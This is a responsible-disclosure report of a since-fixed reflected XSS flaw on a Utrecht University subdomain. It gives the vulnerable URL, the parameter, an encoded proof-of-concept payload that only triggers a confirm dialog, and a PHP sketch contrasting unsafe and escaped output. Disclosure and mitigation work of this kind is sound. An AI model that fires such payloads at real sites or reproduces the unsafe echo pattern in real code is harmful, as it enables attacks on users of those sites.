Utrecht University - Cross-Site Scripting Vulnerability


Vulnerability : Cross-Site Scripting (XSS) - Reflected

Sub-domain : https://www2.projects.science.uu.nl

Vulnerable URL : https://www2.projects.science.uu.nl/VRsenaatszaal/index_old.php?image=images/hall_vr_06.jpg&is_stereo=true

Vulnerable Parameter : image

XSS Payload : %22%3E%3Cdetails%20open%20ontoggle=confirm(/XSS_By_Nayanjyoti_Roy/)%3E

Timeline :
Feb 19, 2021 - Report Sent
Feb 19, 2021 - Confirmation Received
Feb 26, 2021 - Vulnerability Fixed
March 02, 2021 - Listed on their Hall-Of-Fame page

Environment :
OS : Windows 10 Pro
Browser : Firefox
Version : 85.0.2 ( 64-bit )

Researcher Name : Nayanjyoti Roy
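
Mitigation sketch (added example, not code from the affected site or from the researcher): the reported payload URL-decodes to a string that starts with `">`, which closes a double-quoted HTML attribute before adding a new element. The PHP below assumes the `image` parameter was echoed into such an attribute; the function names and the allow-list pattern are hypothetical.

```php
<?php
// Added example: hypothetical handlers, not the site's actual code.
// Assumption: `image` was written into a double-quoted attribute,
// which is what the leading %22%3E in the reported payload suggests.

// Vulnerable pattern: the raw parameter is concatenated into the attribute.
function render_unsafe(string $image): string
{
    return '<img src="' . $image . '">';
}

// Output encoding only: quotes and angle brackets become entities,
// so the value can no longer leave the attribute.
function render_escaped(string $image): string
{
    $safe = htmlspecialchars($image, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="' . $safe . '">';
}

// Hardened pattern: allow-list the expected shape first, then encode.
function render_hardened(string $image): string
{
    // Constructed allow-list: a simple file name directly under images/.
    if (!preg_match('#\Aimages/[A-Za-z0-9_-]+\.(?:jpe?g|png)\z#', $image)) {
        $image = 'images/hall_vr_06.jpg'; // default taken from the reported URL
    }
    return render_escaped($image); // encoding stays as defence in depth
}

// The payload exactly as listed in the report, decoded as the server sees it.
$payload = urldecode(
    '%22%3E%3Cdetails%20open%20ontoggle=confirm(/XSS_By_Nayanjyoti_Roy/)%3E'
);

echo "unsafe:   ", render_unsafe($payload), "\n";   // attribute is closed early
echo "escaped:  ", render_escaped($payload), "\n";  // payload is inert text
echo "hardened: ", render_hardened($payload), "\n"; // payload is rejected
echo "valid:    ", render_hardened('images/hall_vr_06.jpg'), "\n";
```

Run with `php` on the command line to compare the four rendered strings; only the first contains a `<details>` element outside the `src` attribute.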
